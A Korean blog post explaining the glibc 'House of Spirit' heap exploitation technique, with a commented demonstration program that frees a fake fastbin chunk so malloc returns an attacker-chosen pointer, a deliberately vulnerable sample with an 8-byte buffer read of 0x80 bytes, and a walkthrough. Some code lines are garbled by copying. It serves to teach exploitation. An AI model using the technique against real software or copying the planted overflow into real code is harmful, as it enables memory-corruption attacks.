1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdio.h>
#include <stdlib.h>
 
int main()
{
    printf("This file demonstrates the house of spirit attack.\n");
 
    printf("Calling malloc() once so that it sets up its memory.\n");
    malloc(1);
 
    printf("We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
    unsigned long long *a;
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
 
    printf("This region must contain two chunks. The first starts at %p and the second at %p.\n"&fake_chunks[1], &fake_chunks[7]);
 
    printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1= 0x40// this is the size
 
    printf("The chunk.size of the *next* fake region has be above 2*SIZE_SZ (16 on x64) but below av->system_mem (128kb by default for the main arena) to pass the nextsize integrity checks .\n");
    fake_chunks[9= 0x2240// nextsize
 
    printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n"&fake_chunks[1]);
    printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
    a = &fake_chunks[2];
 
    printf("Freeing the overwritten pointer.\n");
    free(a);
 
    printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n"&fake_chunks[1], &fake_chunks[2]);
    printf("malloc(0x30): %p\n"malloc(0x30));
}
 
 
cs

 

간단하게 말하자면,

"Frees a fake fastbin chunk to get malloc to return a nearly-arbitrary pointer."

가짜 fastbin chunk 를 free 시켜서 malloc 할당 시 임의의 포인터를 반환하도록 한다. 즉, 이를 통해 우리가 원하는 곳에 값을 쓸 수 있다.

heap overflow 를 통한 fd overwrite 와 다른 점은, House of Spirit 는 free 의 목표 주소를 변조하여 fake chunk 를 fastbin 에 넣고, 그 뒤에 malloc 을 통해 fake chunk 를 반환받는다.

 

* example code

 

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

 

int main(int argc, char *argv[]) {

void *p = malloc(32);

char buf[8];

 

read(0, buf, 0x80);

 

free(p);

 

malloc(32);

}

위 코드에서 데이터를 read 하여 buf 에 저장 시, 오버플로우를 통해 fake chunk 를 만들고 p 를 fake chunk 에 대응하는 메모리 주소로 수정이 가능하다.

 

malloc.c 의 코드를 보면 위 그림과 같은 부분이 존재하는데, glibc 에서 free 할 때 뒤에 인접한 chunk 의 크기를 검사한다.

따라서, fake chunk 뒤에 next fake chunk 또한 필요하다.

next fake chunk 의 사이즈가 SIZE_SZ*2 보다 작거나 av->system_mem 보다 크지 않으면 된다.

 

fastbin 에 fake chunk 주소가 free 되어 들어간 것을 확인할 수 있다.

다음 malloc(32) 실행 시, malloc(32) 에서 반환하는 주소는 0xbffff6e0 이 된다.

Posted by woodonggyu

댓글을 달아 주세요